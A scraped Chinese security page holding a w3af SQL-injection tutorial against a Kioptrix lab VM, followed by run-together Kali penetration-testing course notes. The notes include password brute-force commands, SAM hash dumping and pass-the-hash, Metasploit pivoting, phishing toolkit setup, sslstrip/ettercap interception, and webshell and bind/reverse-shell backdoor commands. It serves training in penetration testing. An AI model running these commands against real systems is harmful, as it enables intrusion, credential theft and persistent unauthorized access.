来源:蜘蛛抓取(WebSpider)
时间:2016-10-26 16:17
标签:
w3af卡死
w3af简单使用教程 -
| 关注黑客与极客
w3af简单使用教程
共479987人围观
,发现 5 个不明物体
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×00 概述
在BackTrack5R3下使用w3af测试Kioptrix Level 4的SQL注入漏洞.
0×01 简介
w3af是一个Web应用程序攻击和检查框架.该项目已超过130个插件,其中包括检查网站爬虫,SQL注入(SQL Injection),跨站(XSS),本地文件包含(LFI),远程文件包含(RFI)等.该项目的目标是要建立一个框架,以寻找和开发Web应用安全漏洞,所以很容易使用和扩展.
0×02 安装
root@bt:~# apt-get install w3af
0×03 启动
root@bt:~# cd /pentest/web/w3af/
root@bt:/pentest/web/w3af# ./w3af_console
0×04 漏洞扫描配置
w3af&&& plugins
//进入插件模块
w3af/plugins&&& list discovery
//列出所有用于发现的插件
w3af/plugins&&& discovery findBackdoor phpinfo webSpider
//启用findBackdoor phpinfo webSpider这三个插件
w3af/plugins&&& list audit
//列出所有用于漏洞的插件
w3af/plugins&&& audit blindSqli fileUpload osCommanding sqli xss
//启用blindSqli fileUpload osCommanding sqli xss这五个插件
w3af/plugins&&& back
//返回主模块
w3af&&& target
//进入配置目标的模块
w3af/config:target&&& set target http://192.168.244.132/
//把目标设置为http://192.168.244.132/
w3af/config:target&&& back
//返回主模块
0×05 漏洞扫描
w3af&&& start
New URL found by phpinfo plugin: http://192.168.244.132/
New URL found by phpinfo plugin: http://192.168.244.132/checklogin.php
New URL found by phpinfo plugin: http://192.168.244.132/index.php
New URL found by webSpider plugin: http://192.168.244.132/
New URL found by webSpider plugin: http://192.168.244.132/checklogin.php
New URL found by webSpider plugin: http://192.168.244.132/index.php
Found 3 URLs and 8 different points of injection.
The list of URLs is:
- http://192.168.244.132/index.php
- http://192.168.244.132/checklogin.php
- http://192.168.244.132/
The list of fuzzable requests is:
- http://192.168.244.132/ | Method: GET
- http://192.168.244.132/ | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/ | Method: GET | Parameters: (view="phpinfo")
- http://192.168.244.132/checklogin.php | Method: GET
- http://192.168.244.132/checklogin.php | Method: POST | Parameters: (myusername="", mypassword="")
- http://192.168.244.132/index.php | Method: GET
- http://192.168.244.132/index.php | Method: GET | Parameters: (mode="phpinfo")
- http://192.168.244.132/index.php | Method: GET | Parameters: (view="phpinfo")
Blind SQL injection was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The injectable parameter is: "mypassword". This vulnerability was found in the requests with ids 309 to 310.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "supplied argument is not a valid MySQL". The error was found on response with id 989.
A SQL error was found in the response supplied by the web application, the error is (only a fragment is shown): "mysql_". The error was found on response with id 989.
SQL injection in a MySQL database was found at: "http://192.168.244.132/checklogin.php", using HTTP method POST. The sent post-data was: "myusername=John&Submit=Login&mypassword=d'z"0". The modified parameter was "mypassword". This vulnerability was found in the request with id 989.
Scan finished in 19 seconds.
//开始扫描
0×06 漏洞利用配置
w3af&&& exploit
//进入漏洞利用模块
w3af/exploit&&& list exploit
//列出所有用于漏洞利用的插件
w3af/exploit&&& exploit sqlmap
//使用sqlmap进行SQL注入漏洞的测试
Trying to exploit using vulnerability with id: []. Please wait...
Vulnerability successfully exploited. This is a list of available shells and proxies:
- [0] &sql object ( dbms: "MySQL &= 5.0.0" | ruser: "root@localhost" )&
Please use the interact command to interact with the shell objects.
//测试存在SQL注入漏洞
//这里要记住shell objects(这里是0),等一下要用到
0x07 漏洞利用
w3af/exploit&&& interact 0
//interact + shell object就可以利用了
Execute "exit" to get out of the remote shell. Commands typed in this menu will be run through the sqlmap shell
w3af/exploit/sqlmap-0&&&
//sqlmap的一个交互式模块
w3af/exploit/sqlmap-0&&& dbs
Available databases:
[*] information_schema
[*] members
//成功获得数据库信息
必须您当前尚未登录。
必须(保密)
这家伙太懒,还未填写个人描述!
分享每日精选文章一.kali 安全渗透的一般测试 流程1.信息收集目标在线主机,域名信息,邮箱地址,常用密码,同网段信息,子域名信息,指纹信息,端口信息2.漏洞分析cisco工具集(cisoco工具)fuzzing工具集openvas开源评估软件扫描工具集数据库评估软件3.漏洞利用4.权限维持(创建一个后门)5.文档编辑二.谷歌黑客(goole hacker)1.通过互联网 DNS查询大数据http://www./google-dorks/1 theHarverster信息搜集工具theharvester - -l 500 -b google&&&&&&&&&&& theharvester - -b pgp&&&&&&&&&&& theharvester -d microsoft -l 200 -b linkedintheharvester - -l 500 -b all2 metagoolefilUsage: metagoofil options&&&&&&&& -d: domain to search&&&&&&&& -t: filetype to download (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)&&&&&&&& -l: limit of results to search (default 200)&&&&&&&& -h: work with documents in directory (use "yes" for local analysis)&&&&&&&& -n: limit of files to download&&&&&&&& -o: working directory (location to save downloaded files)&&&&&&&& -f: output file&Examples:& metagoofil.py - -t doc,pdf -l 200 -n 50 -o applefiles -f results.html& metagoofil.py -h yes -o applefiles -f results.html (local dir analysis)三 信息搜集之目标获取域名系统是因特网的一项服务,它作为域名和IP地址相互映射的一个分布式的数据库&& &从给定一个主域名到一个子域名的信息收集,是对目标的获取与整理。dnsmap,dnsenum,fierce,dnsdict6DNS区域传送指得是一台备用服务器使用来自主服务器的数据刷新自己的域数据库。这为运行中的dns服务提供了一定的冗余度,其目的是为了防止主的域名服务器因意外故障变得不可用是影响到整个域名的解析。一般来说,DNS区域传送操作只在网络里真的有备用域名DNS服务器时,才有必要用到,但许多DNS服务器却别错误地配置成只要有client发出请求,就会向对方提供一个zone数据库的详细信息。&&&& 由此暴露出威胁:一旦黑客列出某个特定的zone的所有主机,收集域信息,即可选择性的攻击目标,找出未公开使用的IP地址,绕过基于网络的访问控制。& 比如访问163,可以把所有的IP地址全部列出来,公开的和不公开的,攻击者就可以选择一些弱的IP来进行攻击。&& 使用dig进行域名解析(windows nklookup)&& 使用dig进行域传送漏洞&& 子域名枚举工具的介绍与使用dig NS .&& &&& &5&& &IN&& &NS&& &..&& &&& &5&& &IN&& &NS&& &..&& &&& &5&& &IN&& &NS&& &..&& &&& &5&& &IN&& &NS&& &..&& &&& &5&& &IN&& &NS&& &..&& &&& &5&& &IN&& &NS&& &.一个6个来测试是否有域传送漏洞信息dig axfr @ DNS分析工具fiercefierce -dns 进行查询域传送漏洞,如果没有进行枚举和破解dnsdict6 -三.信息收集和主机探测netenum 192.168.1.1/24 &test是通过ping来查看主机是否在线,不是特别靠谱,如果对方有防火墙就不可以了。可以生成一个列表。fping -g ip可以查看那些主机是存活的。nbtscan -r 172.17.135.0/24nbtscan -r 172.17.135.0/24Doing NBT name scan for addresses from 172.17.135.0/24IP address&&&&&& NetBIOS Name&&&& Server&&& User&&&&&&&&&&&& MAC address&&&& &------------------------------------------------------------------------------172.17.135.1&&&& PC-YKCA& &server&& &unknown&&&&&&&& 24:b6:fd:1a:87:dd172.17.135.2&&&& REDBULL&&&&&&&&& &server&& &unknown&&&&&&&& 00:0c:29:09:bb:e8172.17.135.3&&&& TXD-& &server&& &unknown&&&&&&&& 00:0c:29:d2:45:88172.17.135.131&& BOBO&&&&&&&&&&&& &server&& &unknown&&&&&&&& 8c:89:a5:27:b5:b6172.17.135.140&& DYJ&&&&&&&&&&&&& &server&& &unknown&&&&&&&& 08:10:76:df:4d:83arping 172.17.135.4可以查看到mac地址的嗅探内网包(借助于一些ARP协议包的扫描)netdiscover -h&Currently scanning: 192.168.224.0/16&& |&& Screen View: Unique Hosts&&&&&&&& &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&5 Captured ARP Req/Rep packets, from 3 hosts.&& Total size: 300&&&&&&&&&&&&& &&_____________________________________________________________________________&& IP&&&&&&&&&&& At MAC Address&&&&& Count& Len&& MAC Vendor&&&&&&&&&&&&&&&&& &&----------------------------------------------------------------------------- &192.168.149.2&& 00:50:56:ef:8b:c6&&& 03&&& 180&& VMWare, Inc.&&&&&&&&&&&&&&& &&192.168.149.1&& 00:50:56:c0:00:08&&& 01&&& 060&& VMWare, Inc.&&&&&&&&&&&&&&& &&192.168.149.254 00:50:56:fa:94:bd&&& 01&&& 060&& VMWare, Inc.dmitry 可以看到一些注册人,和子域名的信息wafw00f http://www.看是否有waf有保护,先用一个黑名单进行发送,然后看看发送回来有没有。Checking http://www.Generic Detection results:No WAF detected by the generic detectionNumber of requests: 13对目标是否存在负载均衡检测器工具可以检测多个IP地址映射到单个域名lbd www.四。信息搜集之主机扫描(课程目的,课程介绍)1主机探测 版本探测 系统探测 支持探测脚本的编写https 443 weblogic701 oracle 1521nmap的使用nmap -iL target.txt 保存到一个列表zenmap五 信息搜集之指纹识别1.banner抓取最简单最基础,不需要专门的工具就可以做。banner抓取是应用程序的指纹识别而不是操作系统的识别。curl -I www.curl -I www.HTTP/1.1 200 OKDate: Mon, 01 Dec :42 GMTServer: Apache/2.0.59 (Unix)Last-Modified: Mon, 01 Dec :49 GMTETag: "ee8a5e40"Accept-Ranges: bytesContent-Length: 26937Content-Type: text/html有时候Telnet也可以进行探测,nc有时候也可以。nmap -sV -Pn -sT www. -p80xprobe2 目标地址 对于老系统比较好被动指纹识别工具p0f&&& 进行被动抓取数据包web指纹识别whatweb www.http://www. [200] ActiveX[Flash-ActiveX][d27cdb6e-ae6d-11cf-96b8-], Adobe-Flash, Apache[2.0.59], Country[CHINA][CN], Frame, HTTPServer[Unix][Apache/2.0.59 (Unix)], IP[211.71.233.21], JQuery, Meta-Author[%E5%A4%A7%E6%B1%89%E7%BD%91%E7%BB%9C], Object["/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0]["clsid:d27cdb6e-ae6d-11cf-96b8-], Script[javascript,text/javascript], Title[%E9%98%B2%E7%81%BE%E7%A7%91%E6%8A%80%E5%AD%A6%E9%99%A2]探取cms识别工具wpscan -u www.91ri.org六 信息搜集 协议分析针对smb利用工具acccheck& 主要检查共享连接 ipc$ admin$,利用用户名和密码来进行攻击。amplesAttempt the 'Administrator' account with a [BLANK] password.&& &acccheck -t 10.10.10.1Attempt all passwords in 'password.txt' against the 'Administrator' account.&& &acccheck -t 10.10.10.1 -P password.txtAttempt all password in 'password.txt' against all users in 'users.txt'.&& &acccehck -t 10.10.10.1 -U users.txt -P password.txtAttempt a single password against a single user.&& &acccheck -t 10.10.10.1 -u administrator -p passwordsmtp-user-enum 来查看有哪些邮箱等等$ smtp-user-enum.pl -M VRFY -U users.txt -t 10.0.0.1$ smtp-user-enum.pl -M EXPN -u admin1 -t 10.0.0.1$ smtp-user-enum.pl -M RCPT -U users.txt -T mail-server-ips.txt$ smtp-user-enum.pl -M EXPN - -U users.txt -t 10.0.0.1sslscan ip& 查看证书,查看是那种加密方式,最后可以得到一些公钥信息数据包分析工具 wireshark七 openvas安装与使用做出作为一个nessus的子工具,也是一个综合扫描的子工具。先进行安装openvas-check-setup 检查更新openvas-mkcert 安装证书(后面全部选择默认)openvas-nvt-sync 更新一些包openvas-mkcert-client -n om -i 为客户端创建证书证书创建成功后,必须创建一个用户进行登录openvasad -c add_user -n root -r Adminopenvassd 必须加载一个插件的加载openvasmd --rebuild更新漏洞库内容openvas-scapdata-sync 更新一些漏洞信息openvas-certdata-sync更新完以后可以运行 openvasmd --rebuild更新完以后,需要结束openvassd进程,重新启动服务,使用openvas-check-setup检查无误。openvas-startopenvasmd& 管理那个模块没有开启,手动开启gsad --listen=0.0.0.0 --port=9392 --alisten=127.0.0.1 --aport=9390 --http-only默认端口是9392端口打开的https://localhost:9392/就可以进行登录八 web扫描工具的应用1 golismero scan 2 nikto -h && nikto -h
-p 80,445,21 对指定端口进行扫描lynis 系统信息收集工具&lynis --cheak--all默认为当前的操作系统unix-privesc-check standard九 漏洞分析之web爬行内部字典存放的位置/usr/shell/wordlists &1.apche-users -h 172.17.135.4& -l /usr/share/wordlists/apache-user2.0.txt -p 80 -s 0 -e 403 -t 10这个就是枚举的过程,判断目录是否存在。2.cutycap --url= --out=baidu.png相当于对百度网站直接做了一个截图(快照)3.强大的目录扫描工具dirb http://172.17.135.34.dirbuster 图形化的界面工具5.vega 相当于awvs ,但是不是商业化软件6.webslayerweb测试,暴力攻击十 漏洞扫描工具cadaverroot@kaifeng:~# cadaver --helpUsage: cadaver [OPTIONS] http://hostname[:port]/path& Port defaults to 80, path defaults to '/'Options:& -t, --tolerant&&&&&&&&&&& Allow cd/open into non-WebDAV enabled collection.& -r, --rcfile=FILE&&&&&&&& Read script from FILE instead of ~/.cadaverrc.& -p, --proxy=PROXY[:PORT]& Use proxy host PROXY and optional proxy port PORT.& -V, --version&&&&&&&&&&&& Display version information.& -h, --help&&&&&&&&&&&&&&& Display this help message.Please send bug reports and feature requests to &cadaver@webdav.org&cadaver是一个用来浏览和修改webdav共享的Unix命令行程序,就像subversion客户端,它使用了neon的http库,不需要惊讶,neon和cadaver人作者是同一个人。cadaver是自由软件。使用cadaver就像使用命令行的FTP程序,因此他很适合基本的webdav调试。它可以以压缩的方式上传和下载文件,也会检验属性,拷贝,移动和锁定和检索文件。1.cadaver http://172.17.135.22/dav/可以put get 等等一系列操作和iisput差不多davtest可以自动上传一个漏洞文件,一些木马文件2.deblaze& xss或者web会用到3.fimap 远程文件和本地的漏洞扫描文件,会检测一些远程和本地包含漏洞测试。fimap -u "路径" --force-run就可以检测到可以读取那些内容如果get一个webshellfimap -x --force-run 根据提示来进行操作,上传一个shell,然后在进行提权。4.Grabber web漏洞扫描器root@kaifeng:~# grabber -hUsage: grabber.py [options]Options:& -h, --help&&&&&&&&&&& show this help message and exit& -u ARCHIVES_URL, --url=ARCHIVES_URL&&&&&&&&&&&&&&&&&&&&&&& Adress to investigate& -s, --sql&&&&&&&&&&&& Look for the SQL Injection& -x, --xss&&&&&&&&&&&& Perform XSS attacks& -b, --bsql&&&&&&&&&&& Look for blind SQL Injection& -z, --backup&&&&&&&&& Look for backup files& -d SPIDER, --spider=SPIDER&&&&&&&&&&&&&&&&&&&&&&& Look for every files& -i, --include&&&&&&&& Perform File Insertion attacks& -j, --javascript&&&&& Test the javascript code ?& -c, --crystal&&&&&&&& Simple crystal ball test.& -e, --session&&&&&&&& Session evaluationseg:grabber --spider 1 --sql --xss --url http://172.17.135.22/5. joomscan 针对joomlacms来进行测试6. skipfish 是Google出品的一款自动化网络安全扫描工具skipfish -o ~/home/kaifeng(自己创建的目录) 很好工具http://www.7.uniscan-gui 一款图形化界面8.W3af 是一个应用程序攻击检查文件,支持许多插件9.wapiti 的工作方式和nikto差不多python wapiti.py http://172.17.135.22 -v 2可以检测文件处理错误(本地和远程)数据库注入xss注入 xss注入 ldap注入 命令执行检测(eval(),system(),passtru()。。)crlf注射入(http响应,session固定等等)root@kaifeng:~# wapiti http://www.Wapiti-2.2.1 (wapiti.sourceforge.net)Traceback (most recent call last):& File "/usr/bin/wapiti", line 444, in &module&&&& wap.browse(crawlerFile)& File "/usr/bin/wapiti", line 238, in browse&&& self.urls, self.forms = self.HTTP.browse(crawlerFile)可以爬取一些信息10.webshag-gui 综合的条用一些插件11.websploit 扫描远程和分析系统漏洞。可以快速的扫描wsf & show modulesWeb Modules&& &&& &&& &Description-------------------&& &&& &---------------------web/apache_users&& &&& &Scan Directory Of Apache Usersweb/dir_scanner&& &&& &&& &Directory Scannerweb/wmap&& &&& &&& &Information Gathering From Victim Web Using (Metasploit Wmap)web/pma&& &&& &&& &&& &PHPMyAdmin Login Page Scannerweb/cloudflare_resolver&& &&& &CloudFlare ResolverNetwork Modules&& &&& &&& &Description-------------------&& &&& &---------------------network/arp_dos&& &&& &&& &ARP Cache Denial Of Service Attacknetwork/mfod&& &&& &&& &Middle Finger Of Doom Attacknetwork/mitm&& &&& &&& &Man In The Middle Attacknetwork/mlitm&& &&& &&& &Man Left In The Middle Attacknetwork/webkiller&& &&& &TCP Kill Attacknetwork/fakeupdate&& &&& &Fake Update Attack Using DNS Spoofnetwork/arp_poisoner&& &&& &Arp PoisonerExploit Modules&& &&& &&& &Description-------------------&& &&& &---------------------exploit/autopwn&& &&& &&& &Metasploit Autopwn Serviceexploit/browser_autopwn&& &&& &Metasploit Browser Autopwn Serviceexploit/java_applet&& &&& &Java Applet Attack (Using HTML)Wireless / Bluetooth Modules&& &&& &Description-------------------&& &&& &---------------------wifi/wifi_jammer&& &&& &Wifi Jammerwifi/wifi_dos&& &&& &&& &Wifi Dos Attackwifi/wifi_honeypot&& &&& &Wireless Honeypot(Fake AP)bluetooth/bluetooth_pod&& &&& &Bluetooth Ping Of Death Attack十一 数据库漏洞工具1.tnscmd10g 不经常用2.sqlsus 开放源代码MySQL注入和接管工具root@kaifeng:~# sqlsus &&&&&&&&&&&&& sqlsus version 0.7.2& Copyright (c)
J&r&my Ruffet (sativouf)Usage:&&& sqlsus [options] [config file]&&&& Options:&&&&&&&& -h, --help&&&&&&&&&&&&&&&&&&& brief help message&&&&&&&& -v, --version&&&&&&&&&&&&&&&& version information&&&&&&&& -e, --execute &commands&&&&&& execute commands and exit&&&&&&&& -g, --genconf &filename&&&&&& generate configuration filesqlsus -f 生成一个配置文件,然后进行编辑修改 our $url_start="";写入地址启动并且调试sqlsus test.conf 获取数据库数据 查看全部数据库名字sqlsus&get databasesqlsus&set database 设定数据库sqlsus&set database mysql 选定为MySQL数据库sqlsus&get tables 获取为MySQL的数据库表3.sqlninja 主要针对sqlserver数据库,来返回一个xp_cmdshell,对sa口令的强力攻击root@kaifeng:~# sqlninja Sqlninja rel. 0.2.6-r1Copyright (C)
icesurfer &&Usage: /usr/bin/sqlninja&& &-m &mode& : Required. Available modes are:& //指定攻击模块,有以下几个&& &&& t/test - test whether the injection is working& #测试连接是否是注入点&& &&& f/fingerprint - fingerprint user, xp_cmdshell and more& #指纹识别,判断用户,数据库,xp_cmdshell是否能用等等&& &&& b/bruteforce - bruteforce sa account& #暴力破解sa密码,可以使用-w指定字典,也可以不使用字典,这样sqlninja就会自己穷举&& &&& e/escalation - add user to sysadmin server role& #提权用,必须用-p指定sa的password,成功就会把当前数据库加入到sa组里面&& &&& x/resurrectxp - try to recreate xp_cmdshell& #尝试恢复xp_cmdshell&& &&& u/upload - upload a .scr file&& #使用get和post上传二进制文件,-p可以指定sa的password,-g表示只生成上传文件,但并不上传&& &&& s/dirshell - start a direct shell& # 获得目标主机的shell&& &&& k/backscan - look for an open outbound port& #查看开放的端口&& &&& r/revshell - start a reverse shell&& #反弹会一个shell,和dirshell相反&& &&& d/dnstunnel - attempt a dns tunneled shell& #指定使用DNS作为传输通道,可用-p指定sa的password,为什么有这个模式。因为可能服务器连icmp都禁止。同样想要使用这个模式得先用upload模式上传dnstun.exe&& &&& i/icmpshell - start a reverse ICMP shell& #档dirshell和revshell都失败的情况下,可以用这个模式把shell藏在icmp里,但是先要上传imcpsh.exe(在upload模式里)&& &&& c/sqlcmd - issue a 'blind' OS command&& #以上方法都失败之后,可以用它执行简单的cmd命令,可惜的是没回回显&& &&& m/metasploit - wrapper to Metasploit stagers& #使用metasploit作为shell&& &-f &file& : configuration file (default: sqlninja.conf)& #指定配置文件,sqlninja没有类似sqlmap的&-u&参数,注入网址是写在配置文件里的,默认是sqlninja.conf。 用数字(0,1,2,3,4)来指定数据库。&& &-p &password& : sa password&& &-w &wordlist& : wordlist to use in bruteforce mode (dictionary method&& &&&&&&&&&&&&&&& only)&& &-g : generate debug script and exit (only valid in upload mode)&& &-v : verbose output&& &-d &mode& : activate debug&& &&& 1 - print each injected command&& &&& 2 - print each raw HTTP request&& &&& 3 - print each raw HTTP response&& &&& all - all of the above&& &...see sqlninja-howto.html for details&默认参数也要写到配置文件里面,默认为sqlninja.confsqlmap sqlmap -u "" --cookie='PHPSESSID=;secsicuty=low' 十二 web代理代理工具数据,进行抓包改包,暴力攻击等等一些操作1.burp suite 代理代表的一些工具2.owasp-zap3.vega 有一个代理4.webscarab &webscarab一款代理软件,包括http代理,网络爬行、网络蜘蛛,回话ID分析,自动脚本接口,模糊测试工具,web格式的编码/解码,web服务描述语言和soap解析器等功能模块。webscarab基于gun协议,使用Java编写,是webgoat中所使用的工具之一。十二 漏洞分析工具fuzz1.bed 能够检查缓存区溢出,格式串漏洞,整数溢出bed -s FTP -t 172.17.132.2 -p 21 -o 52.ohrwurm 主要是rtp3.wfuzz web应用的模糊测试工具,可以进行web应用暴力拆解,也支持对网站目录,登录信息,应用资源文件等的暴力猜解,还可以进行get及post参数的猜解,sql注入,xss漏洞的测试。改工具所有功能都依赖于字典。wfuzz -c -z file,common.txt --hc 404 -o html /FUZZ 2&tes.htmlwfuzz -c -z file,users.txt -z file,pass.txt --hc 404 /log.asp?user=FUZZ&pass=FUZZ登录页面口令猜解,忽略404页面wfuzz -c -z range,1-10 --hc=BBB /FUZZ{something}页面数目猜解,与burp不同的是,它更轻量级。4.xsser 命令行版本和界面版本xsser -u "http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=" --cookie="PHPSESSID=3f0cbd7b5d47396c4aeb2a7;security=low" -v[*] List of possible XSS injections:===========================================================================[I] Target: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=[+] Injection: http://172.17.135.2/dvwa/vulnerabilities/xss_r/?name=/"&a01a46f10d098c521b4eb470e82ea23f[-] Method: xss[-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]十三 在线密码攻击1.cewl 是一个很酷的工具,通过爬行网站获取关键信息创建一个密码字典。官网:http://digi.ninja/projects/cewl.php2.cat 思科审计工具,扫描思科路由器的一般性漏洞:默认密码snmpcommunity字符3.findmyhash findmyhash MD5 -h hash值 去找所有的网站的接口去破解4.hydraFTPhydra -L user.txt -P pass.txt -F ftp://172.17.135.2SSHhydra -L user.txt -P pass.txt -F ssh://172.17.135.2:22SMBhydra -L user.txt -P pass.txt -F smb://172.17.135.2MSSQLhydra -L user.txt -P pass.txt -F mssql://172.17.135.2:14335.medusamedusa -h 172.17.135.2 -u root& -P //wordlist/rockyou.txt -M ssh6.NCrack& 基本功能相似,突出是3389爆破的功能ncrack -vv -U windows.user -P windows.pwd 172.17.135.2:3389,CL=1 -f7.onesixtyone 是一个snmp扫描工具,用于找出设备上的snmp community字符,扫描速度非常快。8.patator& Python编写,如枚举一个服务用户名和密码patator ssh_login host=172.17.135.2 user=root passowrd=FILE0 0=pass.txt -x ignore:mesg='Authentication failed.'9.phrasendrescher10.thc-pptp-bruter 主要针对pptp VPN端点(tcp端口1723)的暴力破解程序。十四 密码离线攻击1.ophcrack 彩虹表2.pyrit& 密码无线攻击pyrit -r xxx.cap analyze开始跑包(单纯字典)pyrit -r xxx.cap -i yyy.dic -b ssid attack_passthrough也可以将pyrit与crunch结合使用crunch 8 8
| pyrit -i - -r /file/hack01-cap -b bssid attach_passthrough3.rcrack 彩虹表密码哈希工具4.rsmanglerrsmangler -f /test& 字典生成工具5.bkhive Linux下破解window下哈希的工具首先获取win下的文件Sam文件: c:\windows\system32\config\samsystem文件: c:\windows\system32\config\system先用bkhive从system文件生成一个bootkey文件bkhive& system bootkey再用bootkey和sam文件通过samdump2生成一个密码hash文件samdump2 sam bootkey &hashes接着只用John破解John hashes即可。6.sucrack& 借助su命令进行本地root账户的密码破解7.truecrack 十四 密码攻击之哈希传递个人感觉主要利用msf(psexec)这个扫描模块来进行传递hash,可以返回来一个payload。通过Windows pwdump7.exe 来进行抓取hash1.pth-winexepth-winexe -U Administrator和hash //172.17.135.2 cmd这样就可以返回一个本地的shell2.keimpxkeimpx -t 172.17.135.2 -c /root/pass.txt -v 2 看pass.txt里面保存的hash来进行一一尝试,是否可以进行连接3.metaspoloitexploit/windows/smb/psexse十五 密码无线的破解十六 metasploit在跳板机子获取一定权限后,需要积极的向内网主机权限发展,获取指定的目标信息,探查系统漏洞,借助msf已经得到的meterpreter后门,可以使系列的操作更容易。1.首先我们先看主机网卡信息,看有多少主机2.如果我们拿到shell ip地址是 172.17.135.2,内网主机为10.0.0.1,因为内网ip我们是无妨访问的。3.首先我们先meterpreter里面增加一条路由run autoroute -s 10.0.0.1 就把我们172段地址加入里面了4.为了访问,我们开一个socks代理模块use auxiliary/server/socksexploit这个时候我们已经创建一个代理了,然后把kali浏览器的代理设置成127.0.0.1 端口设置成1080,然后在访问10.0.0.2,就可以访问了内网的计算机了。run arp_scanner -h 经常查看内网主机run arp_scanner -r 10.0.0.1/24十七 kali漏洞利用工具beff默认的IP http://127.0.0.1:3000/ui/authenticationbeef-xss提供了一个测试页面http://127.0.0.1:3000/demos/basic.html最重要的一项是把beef和metasploit联合起来。下面是配置命令cd /usr/share/beef-xss/vim config.yaml //把metaspoloit那一项改成truecd /extension/metasploitnano config.yaml& //修改host和call_back都改成主机地址然后打开msfconsole输入以下命令load msgrpc ServerHost=主机ip Pass=abc123&cd /usr/share/beef-xss/./beef -x 重新加载metasploit模块这时候重启一下服务service beef-xss restart十八 kali漏洞利用set工具(社会工程会攻击)1 命令行输入 setoolkit打开set套件输入1为社会工程会攻击1鱼叉式攻击 2 网站攻击框架 3 介质感染攻击 4 创建payload攻击 5群发邮件攻击 6基于arduino的攻击 7短信欺骗攻击 8无线接入点攻击 9二维码攻击 10 powershell攻击 11 第三方模块1.鱼叉式攻击主要目的发送存在恶意软件的钓鱼软件,相应的payload模块可以选择。2.开放一个webserver服务,如果对方访问此页面,若系统存在漏洞触发条件,则会被植入后门。 如Java applet attack 方法就需要目标有Java运行环境。为了仿真,你可以选择自建模板或克隆一个网站。(重点演示,可以结合毒化和抓包来进行欺骗内网机子和劫持)3 介质感染攻击借助autorun.inf执行exploit得到一个返回的shell,也可以结合metasploit的后门fasttrack也被整理到setoolkit里面。十九 嗅探欺骗和中间人攻击linux下的中间人攻击套路都是一样的,这里介绍进行ARP欺骗,DNS欺骗和嗅探以及回话劫持(cookie)的方法。1 为kali设置开启端口转发echo 1 & /proc/sys/net/ipv4/ip_forward2设置ssltrip为了劫持ssl数据,需要使https数据变为httpsiptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081让ssltrip在8081端口监听sslstrip -l 8081我们使用的工具ettercap这个中间人攻击工具,如果是第一次使用,需要设置配置配置文件/etc/ettercap/etter.conf 首先要将ec_uid,ec_gid都变为0在把配置文件里面,在linux下面,把下面两行注释警号全部去掉第一步打开 ettercap -G 图形化界面第二十课& web后门1.weevely 仅限php,相当于菜刀的一款工具weevely generate test ~/1.php连接:weevely http://172.17.135.3/1.php test(密码)2.webacoo webacoo -t -u http://172.17.135.3/2.php&系统后门 首先我们先提取进程 ps aux | grep ~/bin/bash"&1.系统端:dbd -l -p 2333(bash进程号) -e /bin/bash -k password&&& 连接端:dbd 127.0.0.1 2333 -k password连接以后,机子并没有什么反应,但是直接执行命令就可以了。2.intersect&数字1 创建一个shell然后依次为 bshell&& creds& portscan& 自由加了三个模块。添加完以后就:create,然后输入shell,还需要绑定端口 5555,远程主机 172.17.135.3 远程端口 23333 。这样就设置完成了。完成以后,下面会给出保存的路径。,默认为.py文件。执行文件./shell.py -b 绑定& 那么这个时候就绑定这个端口了我们在远程用nc进行连接nc -nvv 127.0.0.1 5555& 这个时候就得到一个shell了。第二十一课 权限维持之tunnel1.cryptcat& 使用方法与dbd 方法相似第二十二课 压力测试所谓压力测试,就是攻击服务器所能承受的范围,所谓的ddos攻击。主要是消耗某一种资源,来让服务器不正常。第二十三课 数字取证工具1.peepdf是一个使用Python编写的PDF文件分析工具,它可以检测恶意的pdf文件。其设计目标是为安全研究人员提供的pdf分析中可能用到的所有组件,无需使用3或4种工具来完成同一件任务。2.反数字取证 用来检测 linux下面关键命令是否被注入了后门。3.内从取证工具集volatility是开源的window,linux等内从取证分析工具,有Python编写成,命令行操作,支持各种操作。/articles/system/26763.html4 binwalk 来判断是什么文件格式,原始文件是什么。5 dff 是一个简单但强大的数字取证工具辅助工具,它具有一个灵活的模块系统。具有多种功能,包括:恢复错误或奔溃导致文件丢失,证据的研究和分析等。pdf提供了一个强大的体系结构和一些有用的模块。第二十三课 报告工具与系统服务1.dradis 基于浏览器的在线笔记
阅读(...) 评论()
